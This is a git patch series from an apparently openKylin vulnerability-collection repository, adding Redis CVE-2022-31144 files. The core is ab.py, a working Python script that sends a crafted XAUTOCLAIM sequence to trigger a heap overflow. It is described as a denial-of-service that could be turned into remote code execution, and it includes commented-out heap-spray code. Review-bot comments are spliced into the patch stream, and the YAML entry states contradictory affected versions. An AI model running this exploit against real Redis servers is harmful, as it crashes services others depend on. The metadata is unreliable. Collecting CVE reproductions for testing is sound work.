From 54b98124254e8e6d0abe4565604f349b8bb589b7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:46:33 +0000 Subject: [PATCH 1/7] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 田格格 --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 16958e20..a084eeda 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -82,6 +82,8 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + redis: + - CVE-2022-31144 cnvd: kve: kylin-software-properties: -- Gitee From b442837507ff9c52387050e884eb5475d4ecb92b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:47:29 +0000 Subject: [PATCH 2/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-31144?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/redis/2022/CVE-2022-31144/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/redis/2022/CVE-2022-31144/.keep diff --git a/cve/redis/2022/CVE-2022-31144/.keep b/cve/redis/2022/CVE-2022-31144/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From f2d54fa70f7e4b049e3771daa29964b5b9286270 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:47:45 +0000 Subject: [PATCH 3/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?redis/2022/CVE-2022-31144/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/redis/2022/CVE-2022-31144/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/redis/2022/CVE-2022-31144/.keep diff --git a/cve/redis/2022/CVE-2022-31144/.keep b/cve/redis/2022/CVE-2022-31144/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 88226d294c237c2e0459db54a02a770b1ce35017 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:48:19 +0000 Subject: [PATCH 4/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-31144?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/redis/2022/CVE-2022-31144/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/redis/2022/CVE-2022-31144/.keep diff --git a/cve/redis/2022/CVE-2022-31144/.keep b/cve/redis/2022/CVE-2022-31144/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From d9dc4b0583d7238243f3d04aa9830d7e112e72ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:49:03 +0000 Subject: [PATCH 5/7] CVE-2022-31144 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 田格格 --- cve/redis/2022/CVE-2022-31144/README.md | 3 +++ cve/redis/2022/CVE-2022-31144/ab.py | 34 +++++++++++++++++++++++++ 2 files changed, 37 insertions(+) create mode 100644 cve/redis/2022/CVE-2022-31144/README.md create mode 100644 cve/redis/2022/CVE-2022-31144/ab.py diff --git a/cve/redis/2022/CVE-2022-31144/README.md b/cve/redis/2022/CVE-2022-31144/README.md new file mode 100644 index 00000000..a8dddf66 --- /dev/null +++ b/cve/redis/2022/CVE-2022-31144/README.md @@ -0,0 +1,3 @@ +# CVE-2022-31144 +CVE-2022-31144 dos 4redis. +Rce not finished yet or too soon, this can be turned into rce but oh well if you smart enough diff --git a/cve/redis/2022/CVE-2022-31144/ab.py b/cve/redis/2022/CVE-2022-31144/ab.py new file mode 100644 index 00000000..c60987f0 --- /dev/null +++ b/cve/redis/2022/CVE-2022-31144/ab.py 
@@ -0,0 +1,34 @@
+import redis
+def spray():
+ for i in range(0,500):
+ user_connection.set("fillerA"+str(i),"A"*256)
+ user_connection.set("fillerB"+str(i),"B"*256)
+ user_connection.set("fillerC"+str(i),"C"*256)
+
+def create_group( skey, gname ):
+ try:
+ user_connection.xgroup_create( name=skey, groupname=gname, id="$", mkstream=True )
+ except redis.ResponseError as e:
+ print(f"raised: {e}")
+
+
+user_connection = redis.Redis(host='localhost', port=6379, password='', decode_responses=True)
+x = user_connection.ping()
+if x == True:
+ create_group("s:foo","g:foo")
+ user_connection.xadd("s:foo",{"foo":1},maxlen=1,approximate=True)
+ user_connection.xadd("s:foo",{"foo":2},maxlen=1,approximate=True)
+ user_connection.xadd("s:foo",{"foo":3},maxlen=1,approximate=True)
+ user_connection.xadd("s:foo",{"foo":4},maxlen=1,approximate=True)
+ user_connection.xadd("s:foo",{"foo":5},maxlen=1,approximate=True)
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ user_connection.xtrim("s:foo",maxlen=1)
+ print(user_connection.xreadgroup("g:foo","c:1",count=10,streams={"s:foo":"0"}))
+ user_connection.xautoclaim("s:foo","g:foo","c:1",10,0,count=100000000000000000)
+ #spray()
+ #for i in range(200,500,i+2):
+ # user_connection.delete("fillerA"+str(i))
-- Gitee
From 6a375cfe372ef860910fa5fd0bcd18e1f4c0d9f9 Mon Sep 17 00:00:00 2001
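Review bot: `if x == True:` compares the ping result against a boolean with `==`; `if x:` (or `if user_connection.ping():`) is the idiomatic form and reads the same. `spray()` and `create_group()` reference the module-level `user_connection` that is only bound further down the file; this works because both are called after the assignment, but a module docstring stating that the script is a reproduction for CVE-2022-31144 intended only for a disposable local test instance, and that the connection must exist before the helpers are called, would make the ordering and the intent clear to the next reader. The commented-out loop `#for i in range(200,500,i+2):` uses `i` in its own step argument, so it would fail if ever re-enabled; dead code like this and `#spray()` should be removed rather than left in. The handler for `redis.ResponseError` in `create_group` prints and continues, presumably to tolerate an already-existing group on re-runs; a comment saying so, e.g. `# group already exists on re-run: report and continue`, would document that choice.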
From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:49:10 +0000 Subject: [PATCH 6/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?redis/2022/CVE-2022-31144/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/redis/2022/CVE-2022-31144/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/redis/2022/CVE-2022-31144/.keep diff --git a/cve/redis/2022/CVE-2022-31144/.keep b/cve/redis/2022/CVE-2022-31144/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 904588e34a79c82be53be4045c14e301d1604421 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 02:01:20 +0000 Subject: [PATCH 7/7] add cve/redis/2022/yaml/CVE-2022-31144.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 田格格 --- cve/redis/2022/yaml/CVE-2022-31144.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/redis/2022/yaml/CVE-2022-31144.yaml diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml new file mode 100644 index 00000000..7b5dcafb --- /dev/null +++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml 
@@ -0,0 +1,24 @@
+id: CVE-2022-31144
+source:
+ https://github.com/SpiralBL0CK/CVE-2022-31144
+info:
+ name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力.
+ severity: High
+ description: |
+ Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布.
+ scope-of-influence:
+ 7.0 <= redis < 7.0.4
+ reference:
+ - https://github.com/redis/redis/releases/tag/7.0.4
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-31144
+ - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh
+ - https://security.gentoo.org/glsa/202209-17
+ - https://security.netapp.com/advisory/ntap-20220909-0002/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2022-31144
+ cwe-id: CWE-787, CWE-122
+ cnvd-id: None
+ kve-id: None
+ tags: 堆溢出, 远程代码执行
\ No newline at end of file
-- Gitee
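Review bot: The `description` text says the issue affects `7.7.0 之前的 4.x 分支上的版本`, which contradicts the `scope-of-influence` line `7.0 <= redis < 7.0.4` and the 7.0.4 release referenced just below it; the sentence should read `此问题会影响 7.0.4 之前的 7.x 分支上的版本.`. The `name` field describes Redis's sandboxed Lua scripting, which has no bearing on this XAUTOCLAIM heap-overflow entry; a name that identifies the product and the flaw, e.g. `name: Redis XAUTOCLAIM 堆溢出漏洞`, would be more useful to anyone triaging the list. The file also ends without a trailing newline (`\ No newline at end of file`), which is worth adding so the entry round-trips cleanly through yaml tooling.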